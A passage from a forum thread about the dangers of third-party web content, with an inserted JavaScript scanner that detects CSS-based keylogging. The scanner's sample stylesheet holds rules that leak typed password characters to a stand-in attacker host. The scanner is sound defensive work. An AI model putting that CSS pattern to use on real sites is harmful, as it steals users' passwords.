          otherwise I can't log in to one of my very favorite websites of ill repute.

          After doing this too many times I just switched to Chrome.

          --
          Yes I Have No Bananas. [gofundme.com]
          • (Score: 2) by RS3 on Thursday March 01 2018, @02:11AM (2 children)

            by RS3 (6367) on Thursday March 01 2018, @02:11AM (#645564)

            Have you tried Vivaldi? I'm using it a lot (like now). It's chrome-based, and I think it's slightly faster, but I haven't done a 1-to-1 comparison. Most software, cleaners, plugins, etc., see it as chrome. I just like the UI and settings better.

            • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @07:39AM (1 child)

              by MichaelDavidCrawford (2339) Subscriber Badge <mdcrawford@gmail.com> on Thursday March 01 2018, @07:39AM (#645660) Homepage Journal

              I'll give it a try this weekend.

              Really I prefer Safari to Chrome. Hopefully I will prefer Vivaldi to Safari.

              Safari doesn't have an API for Add-Ons.

              --
              Yes I Have No Bananas. [gofundme.com]
              • (Score: 2) by RS3 on Thursday March 01 2018, @03:07PM

                by RS3 (6367) on Thursday March 01 2018, @03:07PM (#645784)

                You're so kind, thank you. There are too many browsers out there. I've been using Dolphin on Android (when I'm not near a bigger computer) and it's pretty cool. I've also been using Opera Mini on Android. Ever since a Chinese company bought Opera I'm cautious: nothing involving $, personal info, logins, etc., is done on Android.

                I do use Safari on MacOS, but I've never tried it on PC.

                I'm curious how you like Vivaldi. They update it fairly regularly. I'm not a fan of auto-updaters, and every time you update Vivaldi it turns on: (upper-left "V" button) --> Tools --> Settings --> Updates --> Notify About Updates, which just starts and runs update_notifier.exe.

                Extensions I have installed (there are so many available), but not necessarily turned on, are:

                Adblock Plus
                AdGuard AdBlocker
                DuckDuckGo Privacy Essentials (DuckDuckGo is the default web search for Vivaldi)
                Fair AdBlocker
                Fair AdBlocker App
                Fair Ads
                Script Blocker for Chrome
                Script Defender

                Extensions I have installed and usually turned on:

                disable-HTML
                HTML5 Video Autoplay Blocker
                Disable HTML5 Autoplay
                Privacy Badger
                uBlock Adblock Plus
                uBlock Origin
                uBlock Origin Extra
                Video Blocker by plowman

                Awesome extension, on when I'm super-cautious, bit of a learning curve including that you teach it as you go:

                uMatrix

    • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:14AM (2 children)

      by MichaelDavidCrawford (2339) Subscriber Badge <mdcrawford@gmail.com> on Thursday March 01 2018, @01:14AM (#645544) Homepage Journal

      "One of my customers complained that his computer was slow. He had nine toolbars." -- Thomas Leavitt [880itservices.com].

      You can make something foolproof but you can't make it damnfool-proof.

      --
      Yes I Have No Bananas. [gofundme.com]
      • (Score: 2) by maxwell demon on Thursday March 01 2018, @07:01AM (1 child)

        by maxwell demon (1608) on Thursday March 01 2018, @07:01AM (#645648) Journal

        There is no inherent reason why a toolbar should make your computer slow (unless you are low on memory). A well-designed toolbar should just sit there until you use it, without eating resources (other than the little that is needed to display it; but note that otherwise something else would be displayed at that place).

        --
        The Tao of math: The numbers you can count are not the real numbers.
  • (Score: 3, Insightful) by bzipitidoo on Wednesday February 28 2018, @06:46PM (1 child)

    by bzipitidoo (4388) on Wednesday February 28 2018, @06:46PM (#645300) Journal

    Big, supposedly reputable organizations have given me more trouble than petty criminals. Big is what makes them so hard to stop, and they know it. They don't use script kiddie hacks, CSS vulnerabilities, or whatever other trickery to rob you, they do it all nice and legally if not morally. What do you do when your ISP hikes your rates, again? Changes the terms to add new limits with big penalties or fees for exceeding them? You sure can't complain to the police that you're being robbed. So, do without Internet access? Or suck it up?

    As for CSS vulnerabilities, simply employing sandboxes seems an easy technical fix. Sure is a lot easier to whip up a sandbox than sue Big.com.

    • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @01:19AM

      by MichaelDavidCrawford (2339) Subscriber Badge <mdcrawford@gmail.com> on Thursday March 01 2018, @01:19AM (#645547) Homepage Journal

      Not long after some Fortune 500 corp acquired XenSource, they redirected all its URLs to its own domain.

      Now all those old URLs 404. They never even tried to redirect them to content that might result in a sale.

      That kind of thing is quite common when the web designers don't have to panhandle for spare change - or sing on the street:

      Whenever I want to remove a resource, I make damn sure it redirects to something useful.

      --
      Yes I Have No Bananas. [gofundme.com]
  • (Score: 5, Interesting) by requerdanos on Wednesday February 28 2018, @06:49PM (15 children)

    by requerdanos (5997) Subscriber Badge on Wednesday February 28 2018, @06:49PM (#645302) Journal

    Third-Party Web Content is Unsafe... While most are acutely aware, yet ignore, the danger presented by third-party javascript and javascript in general, most forget about CSS.

    I am webmaster and/or server admin for several sites. The ones where I have editorial control and decision-making power, I eliminate third-party content as a standard practice.

    But some (a wordpress full of plugins, for example) just don't work that way because of the toxic phone-home viewpoint pervasive in the technology industries.

    Just as your home automation used to be, years ago (think X10), based on devices you own that do their work in your home, and now are expected to be on devices (think Alexa) you license, who do no work but simply turn everything over to their masters back at the home office, so website features used to be things that you coded into your website, that ran on your server, but now are expected to be simply references to some master back at the home office on a third party server.

    In both cases, I think this is the wrong way to go.

    Google fonts/analytics? bzzt. I request fonts in css with graceful fallback to sans, serif, mono, etc, and analyze my web logs.

    Just insert this iframe ad code? Bzzt. If I want to add a link, I add a link, not an iframe. I am working on writing an ad distribution network where the ads live on the server and are part of the web site that displays them, and are counted by tiny graphic elements within the ad that the user can cheerfully choose to not load, just like the ads themselves which will be clearly delineated with something like <div id="here-be-ads-matey">.

    This handy web 2.0, 3.0, 9.0 widget, just add this code to call the javascript code on our servers? Bzzt. This is the wrong approach!

    I wish the people that made web pages would adopt this view. It affects everyone who looks at a web page, but the page makers are the group that accept or reject these technologies in a way that makes them successful or not.

    If that doesn't happen, then third-party content being unsafe will still be true, but will remain unavoidable. Because it is completely avoidable, that would be a security-hating shame.

    • (Score: 3, Insightful) by Arik on Wednesday February 28 2018, @07:07PM (5 children)

      by Arik (4543) on Wednesday February 28 2018, @07:07PM (#645312) Journal
      Unfortunately these people are automatons. Wage slaves just trying to get through the day and on to the things they actually care about.

      The only way I can see, at this point, to force any sort of sane web practices would be for browsers to start enforcing sanity and after so many years of bending over backwards in the other direction that doesn't exactly seem likely. As long as they can get away with it, they're going to keep doing it, and what's more bad eventually drives good out of the market in that situation - each year fewer and fewer people will bother to pay for skilled labor to do it right when they see everyone else has gone cheap and gets away with it.

      --
      If laughter is the best medicine, who are the best doctors?
      • (Score: 4, Informative) by requerdanos on Wednesday February 28 2018, @07:51PM (2 children)

        by requerdanos (5997) Subscriber Badge on Wednesday February 28 2018, @07:51PM (#645345) Journal

        browsers to start enforcing sanity and after so many years of bending over backwards in the other direction that doesn't exactly seem likely.

        Some of our big browser vendors are Microsoft "You Will Be Windows Ten-ilated; resistance is futile" "Meet Cortana!" and Google "Hey Google, how are your analytics looking for my sites and their googlefonts?"

        So, yeah, no, not likely-looking.

        Unfortunately these people are automatons.

        It's not just apathy among coders. The decision makers are often intelligent people who are really good at what they do (but it isn't IT, it's fixing cars, or practicing law, or doing surgery, or practicing medicine, etc.).

        These people, having management skills, hear "That great (tool|technology) you read about isn't a good fit for your site because it requires dependence on third party inclusions." And they say something like "But if you just did what I said, it would work fine, and most people don't care, right? Get to it if you want to keep getting paid."

        It's like why people who otherwise wouldn't choose to still run Microsoft operating systems. Their job/executive funding source doesn't want to lead anyone to freedom, they just want to lead their company to income, and technology that doesn't respect anyone or anything is widely accepted to a degree that it's easy to just use it and say "it was industry best practices. I was doing good for my company."

        Stallman, who is an admitted nut, is right on this. If you agree, tell him so [fsf.org].

        • (Score: 3, Insightful) by Arik on Thursday March 01 2018, @12:11AM (1 child)

          by Arik (4543) on Thursday March 01 2018, @12:11AM (#645512) Journal
          I used to think Stallman exaggerated the threat.

          Time has proven me wrong. If anything, he's minimized it.
          --
          If laughter is the best medicine, who are the best doctors?
          • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @12:59AM

            by MichaelDavidCrawford (2339) Subscriber Badge <mdcrawford@gmail.com> on Thursday March 01 2018, @12:59AM (#645534) Homepage Journal

            What appeared to be "resume.doc" on my website used to link to the above essay.

            I put that link on my website roughly twenty years ago. The recruiters still ask for word resumes.

            It eventually occurred to me that their resume retrieval applications were hardwired to parse word .doc documents. For word attachments to become a thing of the past, all those body shops would need new versions of those applications. For that to happen, those applications' vendors would have to lift a finger.

            I finally sidestepped the problem by removing my resume from the web. Its old URL still works but it redirects to my homepage.

            --
            Yes I Have No Bananas. [gofundme.com]
      • (Score: 3, Insightful) by el_oscuro on Thursday March 01 2018, @01:52AM (1 child)

        by el_oscuro (1711) on Thursday March 01 2018, @01:52AM (#645556)

        They do. It's called Content-Security-Policy. If a website implements it, it nukes XSS from orbit. Your browser literally says "fuck you" to any in-line or unknown third party JavaScript. The reason it isn't implemented is because it totally breaks the shitty ad model. Websites would have to *actually* host their own ads or at least know exactly where they came from.

        --
        SoylentNews is Bacon! [nueskes.com]
        • (Score: 2) by canopic jug on Thursday March 01 2018, @06:08AM

          by canopic jug (3949) Subscriber Badge on Thursday March 01 2018, @06:08AM (#645630) Journal

          Or they could just do ads without infecting viewers with javascript. There are no technical reasons that the ads could not be plain PNG, JPEG, or GIF. I'm not sure about APNG but maybe that too. On the other hand there are many reasons not to include scripts, especially from the viewpoint of those targeted to receive said scripts. There is now even a word for the malware that spreads through the advertisements, malvertising [wired.com], and it's not a new thing either.

          Brendan Eich, who developed javascript, himself even says you should block javascript used for 3rd party trackers, fingerprinting, and ads. Though that is said as part of his promotion of his new browser, Brave [brave.com].

          --
          Money is not free speech. Elections should not be auctions.
    • (Score: 2) by stretch611 on Wednesday February 28 2018, @09:49PM (2 children)

      by stretch611 (6199) on Wednesday February 28 2018, @09:49PM (#645421)

      Unfortunately, many web "developers" rely on 3rd party code as a crutch. If they did not use 3rd party content they would have to write the code themselves.

      Even the developer of the linked article uses 3rd party content... He has commenting provided by Disqus. (I did not try to look for any, but that was obvious.)

      --
      Now with 5 covid vaccine shots/boosters altering my DNA :P
      • (Score: 2) by requerdanos on Wednesday February 28 2018, @10:13PM

        by requerdanos (5997) Subscriber Badge on Wednesday February 28 2018, @10:13PM (#645436) Journal

        many web "developers" rely on 3rd party code as a crutch. If they did not use 3rd party content they would have to write the code themselves.

        Well, I believe that's because of this pervasive phone-home mindset.

        Before that mindset took hold here, it was "If they did not use third party content then they would have to copy and paste the code into their own site."

        Since having things work autonomously on the server of the website is no longer important, most code doesn't work nowadays unless it's in touch with the mothership.

        I am kind of anti-mothership. Snowden is a hero.

      • (Score: 0) by Anonymous Coward on Thursday March 01 2018, @02:45PM

        by Anonymous Coward on Thursday March 01 2018, @02:45PM (#645774)

        I've started to use third party CSS, but it is served from my servers rather than use a CDN.
        I'm.. not sure if this counts as bad or not (from your point of view).

        I will totally admit it is a crutch though. I find CSS very frustrating to work with and since I started using this framework, I've finished doing CSS-related stuff and still been in a good mood at the end of it!

    • (Score: 2) by el_oscuro on Thursday March 01 2018, @02:12AM (5 children)

      by el_oscuro (1711) on Thursday March 01 2018, @02:12AM (#645566)

      I am also a webmaster, and would love to have ads that I host myself. If you have something, I am definitely interested. I'm hoping to fully implement content-security-policy [google.com], which completely nukes XSS and any other shitty third party content. It also nukes the shitty ad model websites use today, which is literally written in XSS.

      --
      SoylentNews is Bacon! [nueskes.com]
      • (Score: 2) by Pino P on Thursday March 01 2018, @10:14PM (4 children)

        by Pino P (4721) on Thursday March 01 2018, @10:14PM (#646038) Journal

        I agree that web ads are broken. But what not-broken revenue model would you prefer?

        Paywall: This turns away users arriving at the site from search, social sharing, or citation in other documents, because few people are willing to spend $6 on a month's subscription to one site (or on a 300-pack of article views on one site) just to read one article. Selling individual articles doesn't work outside scholarly journals because of the fee per transaction that both credit card processors and ACH processors charge to merchants.

        Publisher-hosted ads: Daring Fireball sells ad space directly to advertisers. But then not all sites receive nearly as much traffic as Daring Fireball, and it'd be much harder for smaller sites to find buyers for their inventory.

        Something else: I'm curious what you have in mind.
        • (Score: 2) by Justin Case on Thursday March 01 2018, @10:56PM (3 children)

          by Justin Case (4239) on Thursday March 01 2018, @10:56PM (#646063) Journal

          what not-broken revenue model would you prefer?

          None.

          Maybe you consider that "broken", but the web was a lot better before all the fast-buck artists showed up.

          People who thought they had something worth saying paid a few bucks a year for web hosting to get their message out, or share their software, or whatever they'd created that seemed worthwhile to them. Participants in this "sharing economy" invariably got a thousand times more out than they put in, and the freeloaders weren't much of a burden.

          Then a billion assholes showed up, all thinking "how can I get rich from other people's work?" and it has plummeted downhill like a rocket-powered bobsled ever since.

          Our big mistake was making it easy for idiots. We need to return to the days when a little technical knowledge was required as a small barrier to entry.

          • (Score: 2) by Pino P on Friday March 02 2018, @01:54AM (2 children)

            by Pino P (4721) on Friday March 02 2018, @01:54AM (#646158) Journal

            A return from a commercially dominated web to a hobbyist-dominated web would decrease the demand among viewers for Internet access, which would in turn make it no longer economical for your ISP or its competitors in your area (if any) to continue to offer high-speed Internet access at an affordable rate.

            • (Score: 2) by Justin Case on Friday March 02 2018, @12:59PM (1 child)

              by Justin Case (4239) on Friday March 02 2018, @12:59PM (#646324) Journal

              You don't need high speed when a page is only 40K. And it was not only affordable, you had many providers to choose from, which kept prices down and service up.

              • (Score: 2) by Pino P on Friday March 02 2018, @03:59PM

                by Pino P (4721) on Friday March 02 2018, @03:59PM (#646441) Journal

                Though dial-up was competitive, you did need a POTS line, and many households have long since given that up in favor of a cellphone.

                How would amateur video be transmitted over such an infrastructure? Mail order DVD+R?

  • (Score: 2) by Azuma Hazuki on Wednesday February 28 2018, @09:33PM (1 child)

    by Azuma Hazuki (5086) on Wednesday February 28 2018, @09:33PM (#645411) Journal

    I *just* a few days ago started teaching myself (X)HTML, CSS 3, and PHP.

    Upon learning that it was possible to include CSS (among other things...) from other sites, that set off an immediate red flag, and I resolved to host everything locally if at all possible. It made me think "No, that sounds like the mother of all XSS vulns..." Glad to see this intuition isn't misplaced; seems my constant paranoia is actually useful in the world of computing!

    --
    I am "that girl" your mother warned you about...
    • (Score: 0) by Anonymous Coward on Wednesday February 28 2018, @11:02PM

      by Anonymous Coward on Wednesday February 28 2018, @11:02PM (#645471)

      yeah. the days of 'cross-site domain scripting is bad' are very much over.

      no ad revenue with that approach.

  • (Score: 2) by Freeman on Wednesday February 28 2018, @09:47PM (1 child)

    by Freeman (732) on Wednesday February 28 2018, @09:47PM (#645420) Journal

    Third-party content is inherently unsafe, because you're not in control of the content. Though, pretty much the *Internet* is unsafe and should be treated like it has Ebola when interacting with it. That being said, I was a little curious as to how someone made a keylogger using CSS. To which the answer is, they didn't. They just passed the React keylogger in using CSS. Bottom line, if it's not hosted on your site, you can't rely on it.

    --
    Joshua 1:9 "Be strong and of a good courage; be not afraid, neither be thou dismayed: for the Lord thy God is with thee"
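An added example, not code from the blog post or from any commenter, covering two things raised in this thread: the selector pattern the CSS "keylogger" demo relied on, and requerdanos's practice of self-hosting fonts with a generic fallback. The pattern is an attribute selector that probes a form field's value (`[value$="a"]`, `[value^="s"]`) paired with a `url()` on another origin, so each match makes the browser fetch a URL that encodes the matched character; it only bites when the framework mirrors the live value into the attribute, the React-like case the thread discusses. The scanner below flags that pattern (plus foreign `@import`s and substring probes on other attributes) in a stylesheet you are about to include, and leaves a self-hosted stylesheet alone. `SITE_ORIGIN`, the attacker host and both sample stylesheets are constructed; nested `@media`/`@supports` blocks are not handled.

```javascript
// Added example (not the blog post's or any commenter's code): a flat-stylesheet
// scanner for the exfiltration pattern the linked CSS "keylogger" demo relied on.
// The pattern is an attribute selector that probes a field's value
// ([value$="a"], [value^="s"], ...) paired with a url() on another origin, so
// each match makes the browser fetch a URL that encodes the matched character.
// It only works when the framework mirrors the live value into the attribute
// (the React-like case discussed in the thread). Nested @media/@supports blocks
// are not handled; SITE_ORIGIN and both stylesheets are constructed for the example.

const SITE_ORIGIN = 'https://example.com'; // assumed first-party origin

function stripComments(css) {
  return css.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Every url(...) argument inside a declaration block, quotes removed.
function urlsIn(text) {
  const out = [];
  const re = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;
  let m;
  while ((m = re.exec(text)) !== null) out.push(m[2].trim());
  return out;
}

// A resource is foreign if, resolved against the site, it lands on another origin.
function isForeign(rawUrl) {
  if (rawUrl.startsWith('data:')) return false;
  try {
    return new URL(rawUrl, SITE_ORIGIN + '/').origin !== SITE_ORIGIN;
  } catch (e) {
    return true; // unparsable: treat as suspicious
  }
}

// [value=...], [value^=...], [value$=...], [value*=...]: the form field's content is being probed.
const VALUE_PROBE = /\[\s*value\s*(?:\^=|\$=|\*=|=)\s*(['"]?)[^\]]*\1\s*\]/i;
// Substring probe on any other attribute (href, data-*, class): weaker, but still a side channel.
const SUBSTRING_PROBE = /\[\s*[\w-]+\s*(?:\^=|\$=|\*=)/;

function scanStylesheet(css) {
  const findings = [];
  const clean = stripComments(css);
  let m;

  // @import of a foreign stylesheet hands that host the same power as a <link> to it.
  const importRe = /@import\s+(?:url\(\s*(['"]?)([^'")]+)\1\s*\)|(['"])([^'"]+)\3)/gi;
  while ((m = importRe.exec(clean)) !== null) {
    const target = m[2] || m[4];
    if (isForeign(target)) {
      findings.push({ severity: 'medium', kind: 'foreign-import', selector: '@import', url: target });
    }
  }

  // Plain "selector { declarations }" rules, with @import statements removed first.
  const rules = clean.replace(/@import[^;]*;/gi, '');
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  while ((m = ruleRe.exec(rules)) !== null) {
    const selector = m[1].trim();
    for (const url of urlsIn(m[2])) {
      if (!isForeign(url)) continue;
      let severity = 'low', kind = 'foreign-resource';
      if (VALUE_PROBE.test(selector)) { severity = 'high'; kind = 'value-exfiltration'; }
      else if (SUBSTRING_PROBE.test(selector)) { severity = 'medium'; kind = 'attribute-probe'; }
      findings.push({ severity, kind, selector, url });
    }
  }
  return findings;
}

function summarize(css) {
  const findings = scanStylesheet(css);
  const count = sev => findings.filter(f => f.severity === sev).length;
  return { total: findings.length, high: count('high'), medium: count('medium'), low: count('low') };
}

// Constructed: self-hosted stylesheet, local font file with a generic fallback. Nothing to flag.
const BENIGN_CSS = `
@font-face { font-family: "Roboto Condensed"; src: url(/fonts/roboto-condensed.woff2) format("woff2"); }
body { font-family: "Roboto Condensed", sans-serif; }
.logo { background-image: url("/img/logo.svg"); }
`;

// Constructed: the exfiltration pattern, one rule per probed character, plus a foreign @import.
const MALICIOUS_CSS = `
@import url("https://cdn.attacker.example/reset.css");
input[name="password"][value$="a"] { background-image: url("https://cdn.attacker.example/k?c=a"); }
input[name="password"][value$="b"] { background-image: url("https://cdn.attacker.example/k?c=b"); }
input[name="password"][value^="s"] { background-image: url(https://cdn.attacker.example/k?first=s); }
.ext-link[href^="https://"] { background-image: url(https://cdn.attacker.example/ext.png); }
`;

console.log(summarize(BENIGN_CSS));
console.log(summarize(MALICIOUS_CSS));
```

Run it over a vendor stylesheet before copying it onto your own server: a clean result does not prove the file safe (the scanner is a pattern check, not a parser), but any `value-exfiltration` hit is a stylesheet you should not be serving at all, and every `foreign-resource` hit is a request your visitors will make to someone else's host.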
    • (Score: 2) by requerdanos on Thursday March 01 2018, @12:30AM

      by requerdanos (5997) Subscriber Badge on Thursday March 01 2018, @12:30AM (#645519) Journal

      the *Internet* is unsafe and should be treated like it has Ebola

      It does in fact have Ebola [wikipedia.org]. It has all the hemorrhagic fevers.

  • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @12:50AM (1 child)

    by MichaelDavidCrawford (2339) Subscriber Badge <mdcrawford@gmail.com> on Thursday March 01 2018, @12:50AM (#645530) Homepage Journal

    By now an ancient build of Safari had the best thing since sliced bread: the Activity window. It listed all the URIs that composed each web page, how big they were as well as their progress toward downloading.

    I was dismayed to see a whole lot of stuff like this:

          http://code.google.com/jquery/jquery.js&id=12345678 [google.com]

    Sometimes the query parameters had names that made their defeat of caching even more apparent.

    A helpful contribution the Open Sores community could reasonably make would be a browser add-on that replaced such URL parameters with the empty string. Not only would that make browsing much faster, it would make life much easier for closeted gay Republican politicians.

    Political campaign websites are by far the worst. None of them are satisfied with using just one analytics "service" - they have to use them all. So just by checking out who's running for city council, you'll be downloading eight different web bugs.

    --
    Yes I Have No Bananas. [gofundme.com]
    • (Score: 1, Informative) by Anonymous Coward on Thursday March 01 2018, @01:13AM

      by Anonymous Coward on Thursday March 01 2018, @01:13AM (#645542)

      You can do that with a userscript in a couple of minutes.

  • (Score: 2) by MichaelDavidCrawford on Thursday March 01 2018, @12:52AM (2 children)

    by MichaelDavidCrawford (2339) Subscriber Badge <mdcrawford@gmail.com> on Thursday March 01 2018, @12:52AM (#645532) Homepage Journal

    A while back I was amused to discover that the parking pages employed by domain speculators often included a favicon.ico that was full of javascript.

    I'd really like to see all the browsers enforce ico-ness on favicon.ico. There's no damn good reason that a browser should load javascript from it.

    --
    Yes I Have No Bananas. [gofundme.com]
    • (Score: 0) by Anonymous Coward on Thursday March 01 2018, @04:12PM (1 child)

      by Anonymous Coward on Thursday March 01 2018, @04:12PM (#645820)

      How else are we going to be able to make it do its spinny thing?

      • (Score: 2) by Pino P on Thursday March 01 2018, @10:18PM

        by Pino P (4721) on Thursday March 01 2018, @10:18PM (#646043) Journal

        <link rel="icon" href="/favicon.gif">
